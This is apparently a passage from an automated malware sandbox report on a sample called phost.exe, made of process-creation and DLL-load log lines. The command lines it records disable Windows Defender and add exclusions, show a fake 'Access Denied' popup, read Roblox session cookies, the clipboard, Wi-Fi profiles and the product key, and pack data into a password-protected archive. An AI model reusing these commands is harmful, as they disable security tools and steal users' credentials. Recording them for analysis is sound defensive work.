              Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
              Source: C:\Users\user\Desktop\phost.exeProcess created: C:\Users\user\Desktop\phost.exe "C:\Users\user\Desktop\phost.exe"
              Source: C:\Users\user\Desktop\phost.exeProcess created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c "powershell -Command Add-MpPreference -ExclusionPath 'C:\Users\user\Desktop\phost.exe'"
              Source: C:\Users\user\Desktop\phost.exeProcess created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c "powershell Set-MpPreference -DisableIntrusionPreventionSystem $true -DisableIOAVProtection $true -DisableRealtimeMonitoring $true -DisableScriptScanning $true -EnableControlledFolderAccess Disabled -EnableNetworkProtection AuditMode -Force -MAPSReporting Disabled -SubmitSamplesConsent NeverSend && powershell Set-MpPreference -SubmitSamplesConsent 2 & "%ProgramFiles%\Windows Defender\MpCmdRun.exe" -RemoveDefinitions -All"
              Source: C:\Users\user\Desktop\phost.exeProcess created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c "mshta "javascript:var sh=new ActiveXObject('WScript.Shell'); sh.Popup('Verify your permission and try again.', 0, 'Access Denied', 48+16);close()""
              Source: C:\Users\user\Desktop\phost.exeProcess created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c "tasklist /FO LIST"
              Source: C:\Users\user\Desktop\phost.exeProcess created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c "wmic csproduct get uuid"
              Source: C:\Users\user\Desktop\phost.exeProcess created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c "REG QUERY HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\Class\{4D36E968-E325-11CE-BFC1-08002BE10318}\0000\DriverDesc 2"
              Source: C:\Users\user\Desktop\phost.exeProcess created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c "REG QUERY HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\Class\{4D36E968-E325-11CE-BFC1-08002BE10318}\0000\ProviderName 2"
              Source: C:\Users\user\Desktop\phost.exeProcess created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c "wmic path win32_VideoController get name"
              Source: C:\Users\user\Desktop\phost.exeProcess created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c "wmic path win32_VideoController get name"
              Source: C:\Users\user\Desktop\phost.exeProcess created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c "powershell -Command Add-MpPreference -ExclusionPath 'C:\ProgramData\Microsoft\Windows\Start Menu\Programs\StartUp\?? ? .scr'"
              Source: C:\Users\user\Desktop\phost.exeProcess created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c "wmic csproduct get uuid"
              Source: C:\Users\user\Desktop\phost.exeProcess created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c "tasklist /FO LIST"
              Source: C:\Users\user\Desktop\phost.exeProcess created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c "WMIC /Node:localhost /Namespace:\\root\SecurityCenter2 Path AntivirusProduct Get displayName"
              Source: C:\Users\user\Desktop\phost.exeProcess created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c "powershell Get-Clipboard"
              Source: C:\Users\user\Desktop\phost.exeProcess created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c "tasklist /FO LIST"
              Source: C:\Users\user\Desktop\phost.exeProcess created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c "tree /A /F"
              Source: C:\Users\user\Desktop\phost.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
              Source: C:\Users\user\Desktop\phost.exeProcess created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c "systeminfo"
              Source: C:\Users\user\Desktop\phost.exeProcess created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c "tree /A /F"
              Source: C:\Users\user\Desktop\phost.exeProcess created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c "REG QUERY HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\Tcpip\Parameters /V DataBasePath"
              Source: C:\Users\user\Desktop\phost.exeProcess created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c "powershell.exe -NoProfile -ExecutionPolicy Bypass -EncodedCommand
              Source: C:\Users\user\Desktop\phost.exeProcess created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c "attrib -r C:\Windows\System32\drivers\etc\hosts"
              Source: C:\Users\user\Desktop\phost.exeProcess created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c "tree /A /F"
              Source: C:\Users\user\Desktop\phost.exeProcess created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c "getmac"
              Source: C:\Users\user\Desktop\phost.exeProcess created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c "attrib +r C:\Windows\System32\drivers\etc\hosts"
              Source: C:\Users\user\Desktop\phost.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
              Source: C:\Users\user\Desktop\phost.exeProcess created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c "powershell Get-ItemPropertyValue -Path HKCU:SOFTWARE\Roblox\RobloxStudioBrowser\roblox.com -Name .ROBLOSECURITY"
              Source: C:\Users\user\Desktop\phost.exeProcess created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c "tasklist /FO LIST"
              Source: C:\Users\user\Desktop\phost.exeProcess created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c "tree /A /F"
              Source: C:\Users\user\Desktop\phost.exeProcess created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c "tree /A /F"
              Source: C:\Users\user\Desktop\phost.exeProcess created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c "powershell Get-ItemPropertyValue -Path HKLM:SOFTWARE\Roblox\RobloxStudioBrowser\roblox.com -Name .ROBLOSECURITY"
              Source: C:\Users\user\Desktop\phost.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
              Source: C:\Users\user\Desktop\phost.exeProcess created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c "wmic os get Caption"
              Source: C:\Users\user\Desktop\phost.exeProcess created: C:\Windows\System32\attrib.exe attrib +r C:\Windows\System32\drivers\etc\hosts
              Source: C:\Users\user\Desktop\phost.exeProcess created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c "wmic csproduct get uuid"
              Source: C:\Users\user\Desktop\phost.exeProcess created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c "powershell Get-ItemPropertyValue -Path 'HKLM:System\CurrentControlSet\Control\Session Manager\Environment' -Name PROCESSOR_IDENTIFIER"
              Source: C:\Users\user\Desktop\phost.exeProcess created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c "wmic path win32_VideoController get name"
              Source: C:\Users\user\Desktop\phost.exeProcess created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c "powershell Get-ItemPropertyValue -Path 'HKLM:SOFTWARE\Microsoft\Windows NT\CurrentVersion\SoftwareProtectionPlatform' -Name BackupProductKeyDefault"
              Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell -Command Add-MpPreference -ExclusionPath 'C:\Users\user\Desktop\phost.exe'
              Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell Set-MpPreference -DisableIntrusionPreventionSystem $true -DisableIOAVProtection $true -DisableRealtimeMonitoring $true -DisableScriptScanning $true -EnableControlledFolderAccess Disabled -EnableNetworkProtection AuditMode -Force -MAPSReporting Disabled -SubmitSamplesConsent NeverSend
              Source: C:\Windows\System32\cmd.exeProcess created: C:\Program Files\Windows Defender\MpCmdRun.exe "C:\Program Files\Windows Defender\MpCmdRun.exe" -RemoveDefinitions -All
              Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\mshta.exe mshta "javascript:var sh=new ActiveXObject('WScript.Shell'); sh.Popup('Verify your permission and try again.', 0, 'Access Denied', 48+16);close()"
              Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\tasklist.exe tasklist /FO LIST
              Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\wbem\WMIC.exe wmic csproduct get uuid
              Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\reg.exe REG QUERY HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\Class\{4D36E968-E325-11CE-BFC1-08002BE10318}\0000\DriverDesc 2
              Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\reg.exe REG QUERY HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\Class\{4D36E968-E325-11CE-BFC1-08002BE10318}\0000\ProviderName 2
              Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\wbem\WMIC.exe wmic path win32_VideoController get name
              Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\wbem\WMIC.exe wmic path win32_VideoController get name
              Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell -Command Add-MpPreference -ExclusionPath 'C:\ProgramData\Microsoft\Windows\Start Menu\Programs\StartUp\?? ? .scr'
              Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\tasklist.exe tasklist /FO LIST
              Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\tasklist.exe tasklist /FO LIST
              Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\wbem\WMIC.exe WMIC /Node:localhost /Namespace:\\root\SecurityCenter2 Path AntivirusProduct Get displayName
              Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell Get-Clipboard
              Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\tasklist.exe tasklist /FO LIST
              Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\tree.com tree /A /F
              Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\netsh.exe netsh wlan show profile
              Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\systeminfo.exe systeminfo
              Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\tree.com tree /A /F
              Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\reg.exe REG QUERY HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\Tcpip\Parameters /V DataBasePath
              Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell.exe -NoProfile -ExecutionPolicy Bypass -EncodedCommand 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
              Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\attrib.exe attrib -r C:\Windows\System32\drivers\etc\hosts
              Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\tree.com tree /A /F
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe "C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\user\AppData\Local\Temp\jnxiphgt\jnxiphgt.cmdline"
              Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\getmac.exe getmac
              Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exeProcess created: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\user\AppData\Local\Temp\RESBE0B.tmp" "c:\Users\user\AppData\Local\Temp\jnxiphgt\CSC11F91C33F0BB4EC3B771882E34D952E.TMP"
              Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\attrib.exe attrib +r C:\Windows\System32\drivers\etc\hosts
              Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\tree.com tree /A /F
              Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell Get-ItemPropertyValue -Path HKCU:SOFTWARE\Roblox\RobloxStudioBrowser\roblox.com -Name .ROBLOSECURITY
              Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\tasklist.exe tasklist /FO LIST
              Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\tree.com tree /A /F
              Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\tree.com tree /A /F
              Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell Get-ItemPropertyValue -Path HKLM:SOFTWARE\Roblox\RobloxStudioBrowser\roblox.com -Name .ROBLOSECURITY
              Source: C:\Windows\System32\cmd.exeProcess created: C:\Users\user\AppData\Local\Temp\_MEI32202\rar.exe C:\Users\user\AppData\Local\Temp\_MEI32202\rar.exe a -r -hp"Logger1@12345" "C:\Users\user\AppData\Local\Temp\C7XW6.zip" *
              Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\wbem\WMIC.exe wmic os get Caption
              Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\wbem\WMIC.exe wmic computersystem get totalphysicalmemory
              Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\wbem\WMIC.exe wmic csproduct get uuid
              Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell Get-ItemPropertyValue -Path 'HKLM:System\CurrentControlSet\Control\Session Manager\Environment' -Name PROCESSOR_IDENTIFIER
              Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\wbem\WMIC.exe wmic path win32_VideoController get name
              Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell Get-ItemPropertyValue -Path 'HKLM:SOFTWARE\Microsoft\Windows NT\CurrentVersion\SoftwareProtectionPlatform' -Name BackupProductKeyDefault
              Source: C:\Users\user\Desktop\phost.exeSection loaded: uxtheme.dll
              Source: C:\Users\user\Desktop\phost.exeSection loaded: kernel.appcore.dll
              Source: C:\Users\user\Desktop\phost.exeSection loaded: vcruntime140.dll
              Source: C:\Users\user\Desktop\phost.exeSection loaded: version.dll
              Source: C:\Users\user\Desktop\phost.exeSection loaded: python3.dll
              Source: C:\Users\user\Desktop\phost.exeSection loaded: libffi-8.dll
              Source: C:\Users\user\Desktop\phost.exeSection loaded: libcrypto-3.dll
              Source: C:\Users\user\Desktop\phost.exeSection loaded: sqlite3.dll
              Source: C:\Users\user\Desktop\phost.exeSection loaded: iphlpapi.dll
              Source: C:\Users\user\Desktop\phost.exeSection loaded: libssl-3.dll
              Source: C:\Users\user\Desktop\phost.exeSection loaded: mswsock.dll
              Source: C:\Users\user\Desktop\phost.exeSection loaded: kernel.appcore.dll
              Source: C:\Users\user\Desktop\phost.exeSection loaded: dnsapi.dll
              Source: C:\Users\user\Desktop\phost.exeSection loaded: rasadhlp.dll
              Source: C:\Users\user\Desktop\phost.exeSection loaded: sspicli.dll
              Source: C:\Users\user\Desktop\phost.exeSection loaded: fwpuclnt.dll
              Source: C:\Users\user\Desktop\phost.exeSection loaded: msasn1.dll
              Source: C:\Users\user\Desktop\phost.exeSection loaded: dpapi.dll
              Source: C:\Users\user\Desktop\phost.exeSection loaded: cryptbase.dll
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: atl.dll
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: mscoree.dll
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: kernel.appcore.dll
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: version.dll
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: vcruntime140_clr0400.dll
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ucrtbase_clr0400.dll
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ucrtbase_clr0400.dll
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptsp.dll
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: rsaenh.dll
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptbase.dll
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: amsi.dll
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: userenv.dll
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: profapi.dll
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: windows.storage.dll
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wldp.dll
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: msasn1.dll
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: gpapi.dll
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: msisip.dll
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wshext.dll
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: appxsip.dll
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: opcservices.dll
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: secur32.dll
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: sspicli.dll
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: uxtheme.dll
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: urlmon.dll
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: iertutil.dll
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: srvcli.dll
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: netutils.dll
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: propsys.dll
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wininet.dll
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: microsoft.management.infrastructure.native.unmanaged.dll
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: mi.dll
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: miutils.dll
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wmidcom.dll
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: dpapi.dll
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wbemcomn.dll
              Source: C:\Windows\System32\mshta.exeSection loaded: wldp.dll
              Source: C:\Windows\System32\mshta.exeSection loaded: mshtml.dll
              Source: C:\Windows\System32\mshta.exeSection loaded: iertutil.dll
              Source: C:\Windows\System32\mshta.exeSection loaded: sspicli.dll
              Source: C:\Windows\System32\mshta.exeSection loaded: powrprof.dll
              Source: C:\Windows\System32\mshta.exeSection loaded: winhttp.dll
              Source: C:\Windows\System32\mshta.exeSection loaded: wkscli.dll
              Source: C:\Windows\System32\mshta.exeSection loaded: netutils.dll
              Source: C:\Windows\System32\mshta.exeSection loaded: umpdc.dll
              Source: C:\Windows\System32\mshta.exeSection loaded: urlmon.dll
              Source: C:\Windows\System32\mshta.exeSection loaded: srvcli.dll
              Source: C:\Windows\System32\mshta.exeSection loaded: kernel.appcore.dll
              Source: C:\Windows\System32\mshta.exeSection loaded: msiso.dll
              Source: C:\Windows\System32\mshta.exeSection loaded: uxtheme.dll
              Source: C:\Windows\System32\mshta.exeSection loaded: srpapi.dll
              Source: C:\Windows\System32\mshta.exeSection loaded: wldp.dll
              Source: C:\Windows\System32\mshta.exeSection loaded: msimtf.dll
              Source: C:\Windows\System32\mshta.exeSection loaded: dxgi.dll
              Source: C:\Windows\System32\mshta.exeSection loaded: resourcepolicyclient.dll
              Source: C:\Windows\System32\mshta.exeSection loaded: textinputframework.dll
              Source: C:\Windows\System32\mshta.exeSection loaded: coreuicomponents.dll
              Source: C:\Windows\System32\mshta.exeSection loaded: coremessaging.dll
              Source: C:\Windows\System32\mshta.exeSection loaded: ntmarta.dll
              Source: C:\Windows\System32\mshta.exeSection loaded: wintypes.dll
              Source: C:\Windows\System32\mshta.exeSection loaded: wintypes.dll
              Source: C:\Windows\System32\mshta.exeSection loaded: wintypes.dllJump to behavior
              Source: C:\Windows\System32\mshta.exeSection loaded: dataexchange.dllJump to behavior
              Source: C:\Windows\System32\mshta.exeSection loaded: d3d11.dllJump to behavior
              Source: C:\Windows\System32\mshta.exeSection loaded: dcomp.dllJump to behavior
              Source: C:\Windows\System32\mshta.exeSection loaded: twinapi.appcore.dllJump to behavior
              Source: C:\Windows\System32\mshta.exeSection loaded: jscript9.dllJump to behavior
              Source: C:\Windows\System32\mshta.exeSection loaded: mpr.dllJump to behavior
              Source: C:\Windows\System32\mshta.exeSection loaded: scrrun.dllJump to behavior
              Source: C:\Windows\System32\mshta.exeSection loaded: version.dllJump to behavior
              Source: C:\Windows\System32\mshta.exeSection loaded: sxs.dllJump to behavior
              Source: C:\Windows\System32\mshta.exeSection loaded: textshaping.dllJump to behavior
              Source: C:\Windows\System32\mshta.exeSection loaded: msls31.dllJump to behavior
              Source: C:\Windows\System32\mshta.exeSection loaded: d2d1.dllJump to behavior
              Source: C:\Windows\System32\mshta.exeSection loaded: dwrite.dllJump to behavior
              Source: C:\Windows\System32\mshta.exeSection loaded: d3d10warp.dllJump to behavior
              Source: C:\Windows\System32\mshta.exeSection loaded: dxcore.dllJump to behavior
              Source: C:\Windows\System32\mshta.exeSection loaded: msasn1.dllJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe  Section loaded: atl.dll
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe  Section loaded: mscoree.dll
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe  Section loaded: kernel.appcore.dll
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe  Section loaded: version.dll
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe  Section loaded: vcruntime140_clr0400.dll
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe  Section loaded: ucrtbase_clr0400.dll
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe  Section loaded: ucrtbase_clr0400.dll
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe  Section loaded: cryptsp.dll
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe  Section loaded: rsaenh.dll
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe  Section loaded: cryptbase.dll
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe  Section loaded: amsi.dll
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe  Section loaded: userenv.dll
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe  Section loaded: profapi.dll
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe  Section loaded: windows.storage.dll
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe  Section loaded: wldp.dll
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe  Section loaded: msasn1.dll
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe  Section loaded: gpapi.dll
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe  Section loaded: msisip.dll
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe  Section loaded: wshext.dll
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe  Section loaded: appxsip.dll
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe  Section loaded: opcservices.dll
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe  Section loaded: secur32.dll
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe  Section loaded: sspicli.dll
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe  Section loaded: uxtheme.dll
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe  Section loaded: urlmon.dll
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe  Section loaded: iertutil.dll
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe  Section loaded: srvcli.dll
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe  Section loaded: netutils.dll
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe  Section loaded: propsys.dll
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe  Section loaded: wininet.dll
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe  Section loaded: microsoft.management.infrastructure.native.unmanaged.dll
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe  Section loaded: mi.dll
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe  Section loaded: miutils.dll
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe  Section loaded: wmidcom.dll
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe  Section loaded: dpapi.dll
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe  Section loaded: wbemcomn.dll
              Source: C:\Windows\System32\tasklist.exe  Section loaded: version.dll
              Source: C:\Windows\System32\tasklist.exe  Section loaded: mpr.dll
              Source: C:\Windows\System32\tasklist.exe  Section loaded: framedynos.dll
              Source: C:\Windows\System32\tasklist.exe  Section loaded: dbghelp.dll
              Source: C:\Windows\System32\tasklist.exe  Section loaded: sspicli.dll
              Source: C:\Windows\System32\tasklist.exe  Section loaded: srvcli.dll
              Source: C:\Windows\System32\tasklist.exe  Section loaded: netutils.dll
              Source: C:\Windows\System32\tasklist.exe  Section loaded: sspicli.dll
              Source: C:\Windows\System32\tasklist.exe  Section loaded: kernel.appcore.dll
              Source: C:\Windows\System32\tasklist.exe  Section loaded: wbemcomn.dll
              Source: C:\Windows\System32\tasklist.exe  Section loaded: winsta.dll
              Source: C:\Windows\System32\tasklist.exe  Section loaded: amsi.dll
              Source: C:\Windows\System32\tasklist.exe  Section loaded: userenv.dll
              Source: C:\Windows\System32\tasklist.exe  Section loaded: profapi.dll
              Source: C:\Windows\System32\wbem\WMIC.exe  Section loaded: iphlpapi.dll
              Source: C:\Windows\System32\wbem\WMIC.exe  Section loaded: framedynos.dll
              Source: C:\Windows\System32\wbem\WMIC.exe  Section loaded: sspicli.dll
              Source: C:\Windows\System32\wbem\WMIC.exe  Section loaded: kernel.appcore.dll
              Source: C:\Windows\System32\wbem\WMIC.exe  Section loaded: wbemcomn.dll
              Source: C:\Windows\System32\wbem\WMIC.exe  Section loaded: msxml6.dll
              Source: C:\Windows\System32\wbem\WMIC.exe  Section loaded: urlmon.dll
              Source: C:\Windows\System32\wbem\WMIC.exe  Section loaded: iertutil.dll
              Source: C:\Windows\System32\wbem\WMIC.exe  Section loaded: srvcli.dll
              Source: C:\Windows\System32\wbem\WMIC.exe  Section loaded: netutils.dll
              Source: C:\Windows\System32\wbem\WMIC.exe  Section loaded: uxtheme.dll
              Source: C:\Windows\System32\wbem\WMIC.exe  Section loaded: vcruntime140.dll
              Source: C:\Windows\System32\wbem\WMIC.exe  Section loaded: vcruntime140_1.dll
              Source: C:\Windows\System32\wbem\WMIC.exe  Section loaded: amsi.dll
              Source: C:\Windows\System32\wbem\WMIC.exe  Section loaded: userenv.dll
              Source: C:\Windows\System32\wbem\WMIC.exe  Section loaded: profapi.dll
              Source: C:\Windows\System32\wbem\WMIC.exe  Section loaded: vbscript.dll
              Source: C:\Windows\System32\wbem\WMIC.exe  Section loaded: sxs.dll
              Source: C:\Windows\System32\svchost.exe  Section loaded: kernel.appcore.dll
              Source: C:\Windows\System32\svchost.exe  Section loaded: qmgr.dll
              Source: C:\Windows\System32\svchost.exe  Section loaded: bitsperf.dll
              Source: C:\Windows\System32\svchost.exe  Section loaded: powrprof.dll
              Source: C:\Windows\System32\svchost.exe  Section loaded: xmllite.dll
              Source: C:\Windows\System32\svchost.exe  Section loaded: firewallapi.dll
              Source: C:\Windows\System32\svchost.exe  Section loaded: esent.dll
              Source: C:\Windows\System32\svchost.exe  Section loaded: umpdc.dll
              Source: C:\Windows\System32\svchost.exe  Section loaded: dnsapi.dll
              Source: C:\Windows\System32\svchost.exe  Section loaded: iphlpapi.dll
              Source: C:\Windows\System32\svchost.exe  Section loaded: fwbase.dll
              Source: C:\Windows\System32\svchost.exe  Section loaded: wldp.dll
              Source: C:\Windows\System32\svchost.exe  Section loaded: ntmarta.dll
              Source: C:\Windows\System32\svchost.exe  Section loaded: profapi.dll
              Source: C:\Windows\System32\svchost.exe  Section loaded: flightsettings.dll
              Source: C:\Windows\System32\svchost.exe  Section loaded: policymanager.dll
              Source: C:\Windows\System32\svchost.exe  Section loaded: msvcp110_win.dll
